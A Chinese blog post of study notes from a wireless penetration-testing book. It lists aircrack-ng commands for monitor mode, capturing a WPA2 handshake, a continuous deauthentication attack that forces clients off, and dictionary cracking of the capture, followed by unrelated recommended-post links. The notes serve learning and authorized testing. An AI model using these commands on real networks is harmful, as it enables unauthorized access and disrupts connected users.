1、对本书出现的无线网络涉及的命令做一总结

查看无线网卡( Create a monitor mode interface using your card as shown in the following screenshot )

ifconfig -a

ifconfig wlan0   （开启无线网卡）    airmon-ng start wlan0（开启混杂&监听模式）

扫描无线端口 接入点，（Ensure that channel hopping happens across bouth the 802.11 b gan g bands）  使用命令airodump-ng  --band ng --cswitch 1 wlan0mon  或者使用

ariodump-ng  wlan0mon

通过是用airodump-ng 发现未授权的用户连接到认证的客户端，访问网络。

收集需要侦查的无线网络MAC地址对应的流量（握手数据包），airodump-ng -c 1 --bssid  8C:A6:DF:B9:70:81  --write  WPA2  wlan0mon

对于没有加密公开的WiFi 理论上抓不到到握手包，所以使用抓包的命令时 同时将自己链接的端切换到一个 加密的Ap广播点。抓包的时候要等待一下，出现 WPA handshake 的时候表示抓包成功

对于不容易抓包的广播点 可以采取适当的攻击手段，迫使掉线之后再次抓包 aireplay-ng --deauth 0 -a 8C:A6:DF:B9:70:81 wlan0mon

使用字典对抓取的握手包进行破解   aircrack-ng -b 8C:A6:DF:B9:70:81 -w words WPA2-01.cap    这里  .cap就是抓取的握手包

Wireless Penetration Testing(命令总结)的更多相关文章

1. Penetration testing _internal & wireless Penetration Testing

   第一部分 渗透测试步骤 ---参考资料  Ethical Hacking: The Value of Controlled Penetration Tests  下载地址  链接:https://pa ...

2. wireless Penetration Testing & Honeypot and Mis-Association attacks

   重新记一遍 ,在捕获握手数据包的时候不容易获取,所以使用ARP请求.使用自己的无线网卡的地址发送请求,会容易使得无线开启端掉线,迫使重新连接. 1.使用命令   aireplay-ng -3 -b a ...

3. Wireless Penetration Testing(7-11 chapter)

   1.AP-less WPA-Personal cracking 创建一个honeypoint  等待链接,特点在于不需要攻击致使链接的客户端掉线,直接获取了流量的握手包. 2.Man-in-the-M ...

4. Penetration Testing、Security Testing、Automation Testing

   相关学习资料 http://www.cnblogs.com/LittleHann/p/3823513.html http://www.cnblogs.com/LittleHann/p/3828927. ...

5. 14 Live CDs for Penetration Testing (Pen Test) and Forensic

   http://www.ivizsecurity.com/blog/penetration-testing/live-cd-penetration-testing-pen/ Yesterday I wa ...

6. Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques

   Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques Jan 04, 2017, Vers ...

7. Metasploit Penetration Testing

   1.Metasploit整体框架: Shell中直接输入msfconsole启动PostgreSQL数据库服务 :service postgresql start 监听5432端口初始化Metaspl ...

8. kali linux revealed mastering the penetration testing distribution

   1.本博客记载的是这本书的学习笔记,还有出现的一些不懂的单词 我也将会记载这篇博客中.记载顺序是按照本书的章节顺序来记载的.最喜欢本书中的一句   you havae no idea how good ...

9. PowerSploit: The Easiest Shell You'll Ever Get - Pentest Geek - Penetration Testing - Infosec Professionals

                   PowerSploit: The Easiest Shell You'll Ever Get - Pentest... Sometimes you just want ...

随机推荐

1. Java 学习之路 之 泛型方法

   前面介绍了在定义类.接口时可以使用类型形参,在该类的方法定义和 Field 定义.接口的方法定义中,这些类型形参可被当成普通类型来用.在另外一些情况下,我们定义类.接口时没有使用类型形参,但定义方法时 ...

2. git 用Gitk /usr/bin/which: no wish

   /usr/bin/which: no wish 安装yum -y install tcl 和yum -y install tk 显示所有的分支 $gitk --all 显示所有的分支 $gitk -- ...

3. Datatypes In SQLite Version 3

   http://www.sqlite.org/datatype3.html http://*.com/questions/7337882/what-is-the-differen ...

4. ModelAndView

   我给你改一下public ModelAndView showDept(HttpServletRequest req,HttpServletResponse resp,ModelMap model){ ...

5. Android中使用JNI获得APK签名的哈希值

   原地址:http://blog.csdn.net/i5suoi/article/details/19036975 最近在研究android应用中的安全问题,貌似只有将核心代码写到JNI底层才是最安全的 ...

6. lumen----------lumen如何安装和使用redis第三方包扩展

   1. 安装扩展 要使用redis必须安装两个扩展 "predis/predis": "~1.0",   "illuminate/redis" ...

7. C Mergeable Stack（list超好用）

   ZOJ  4016 list用法https://www.cnblogs.com/LLLAIH/p/10673068.html 一开始用普通的栈做,超内存,链表模拟栈也没写出来orz.补题发现list超 ...

8. idea 创建的spingmvc 引入jquery后jquery函数始终不执行的原因

9. 简单探究Android平台下' if ' 语句条件判断耗时情况

   2017年6月13日 前言 前几日在改Bug时看到好多调试时用的日志语句都被一个日志开关控制着它的执行权.形如: if(Constants.LOG_TAG){ Log.d(TAG, "Ini ...

10. 【bzoj 2588】Spoj 10628. Count on a tree

    Description 给定一棵N个节点的树,每个点有一个权值,对于M个询问(u,v,k),你需要回答u xor lastans和v这两个节点间第K小的点权.其中lastans是上一个询问的答案,初始 ...